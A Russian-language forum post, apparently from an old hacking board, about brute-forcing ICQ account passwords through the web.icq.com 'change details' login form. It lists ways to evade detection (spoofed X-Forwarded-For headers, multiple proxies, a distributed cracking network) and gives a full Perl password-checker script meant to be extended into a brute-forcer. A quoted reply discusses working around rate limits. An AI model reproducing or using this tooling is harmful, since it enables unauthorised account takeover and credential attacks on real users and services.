Все это конечно хорошо, но зачем забывать о том, что можно делать логин
через веб, чтобы попытаться изменить свою инфу. Это значит, что написав
программу на перле, можно сделать переборщик, который будет очень
быстры. Если учитывать то, что эти идиоты даже не поставили проверку
на REFERER, то....
хммм...у меня нет слов.
Более того, айпишник не блокируется.
Дальше - дальнейшие навороты:
1) Посылаем в пакете каждый раз новое значение поля X-Forwarded 4. Это
заставит админов и возможно сам софт думать что запросы идут с
разных компов за прокси серваком.
2) Дальше, дописываем скрипт так, чтобы он был мультиконнектным и
сразу через несколько проксей проверял. Скорость увеличится как
говорится dramatically.
3) Разрабатываем distributed сеть. Еще сложнее, но увеличит скорость еще
в несколько раз. Это когда перл скрипт установлен на многих компах,...
и списки пассов, которые надо проверить собираются с главного сервера.
Если все это исполнить, то сосать будет не только тот, чью аську
скоммуниздили, но и администраторы мираба.
ПОСЛЕСЛОВИЕ: Не забываем, что у паролей для аси - ограниченный
размер. Это делает брутфорс - реальным занятием.
НО! Все предложенные модернизации требуют много умственных и
физических усилий, и создается вопрос: А НАДО ЛИ ОНО НАМ ВООБЩЕ???
Для того, чтобы доказать, что это пашет, я написал простой Перл скрипт,
который проверяет, правильный ли пароль для эккаунта или нет.
Простой Брутфорсер из этого скрипта сделать несложно - достаточно
всего лишь приделать туда модуль генерации паролей.
Листинг:
======================= Кат @#$ ==========================
#!/usr/local/bin/perl
############################################################
# Configuration
# Your proxy server
$host="127.0.0.1";
$host1="web.icq.com";
$port="3128";
$data="uService=4&Uin=123456&Password=pas%20%20w&SEND=Submit";
# pas%20%20w - Пасс, "pas w"
# 123456 - номер аси
$data_length=length($data);
$path="http://web.icq.com/whitepages/change_details/1,,,00.html";
############################################################
print <<END;
Content-Type: text/html\n\n
<html>
<head>
<title>ICQ Paasword Checker</title>
</head>
<body>
ICQ Paasword Checker<p>
END
############################################################
print "Proxy: $host<br>\n";
print "Port: $port<br>\n";
print "Path: $path<br>\n";
print "DataLength: $data_length\n";
print "Host asked to use: $host1<p>\n\n\n";
use IO::Socket;
my ($remote) = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port);
(die "can't connect: $!\n") unless scalar ($remote);
print $remote "POST $path HTTP/1.0\n";
print $remote "Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,/;
print $remote "Accept-Language: ru,en\n";
print $remote "Accept-Charset: windows-1251,koi8-r,iso-8859-5,cp866,*\n";
print $remote "Content-Type: application/x-www-form-urlencoded\n";
print $remote "Accept-Encoding: gzip, deflate\n";
print $remote "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)\n";
print $remote "Host: $host1\n";
print $remote "Content-Length: $data_length\n";
print $remote "Proxy-Connection: Keep-Alive\n";
print $remote "Pragma: no-cache\n";
print $remote "Cookie: KarmaLogin=C6E09CBAA76BF435CB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DEF805CEDADAC4EB5AAABBB5541B9; KarmaService4=Yes; uin=123456; KarmaLogin=C6E09CBAA7635CDE675AB6FDF422C303E38EC1320B416115CCF85DD5C56DFF0085790186AC50C7DF805CEDAD54EB5AAABBB5541B9; KarmaService4=Yes; uin=123456\n\n";
print $remote "$data";
my (@lines) = <$remote>;
close $remote;
$error=1;
foreach $line (@lines) {
if ( $line =~ /Update Details of ICQ/ ){
$error=0;
}
}
if ($error == 1){
print "Error!\n";
foreach $line(@lines) {
print "$line";
}
}
else {
print "<h3>Result?!</h3>\n<br>";
print "Definitely positive!\n<br>";
}
############################################################
print <<END;
</html></body>
END
############################################################
1;
---
======================= Кат @#$ ==========================
> Да это действительно так, там стоит ограничение на 7
> попыток. НО! Когда я писал летом свой переборщик, я сделал
> задержку между паролями регулируемой. Это позволяло
> перебирать пароли всю ночь
> . но скорость получилась потрясающе низкая - 1 пароль в 2-3
> секунды.
> Несмотря на то что она написана на ЛОГИН пакете аськи
> 2000b.
> СНИФ версии сабмашинГАНа которая была у меня показал что
> она юзает UDP пакеты без шифрования пароля, т.е старую
> версию протокола. Есст-но что это все убивает всякую мечту
> о брутфорсе.
> Была идея подключаться через несколько прокси серверов, но
> руки так и не дошли. Все равно я писал ее для развлечения,
> поэтому она так и осталась в сыром состоянии.
> Так что можешь забыть о переборе паролей. Слишком медленно
> будет. Если конечно ты не решишся на написание своего
> переборщика через 10 прокси серверов. ;)))
|
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
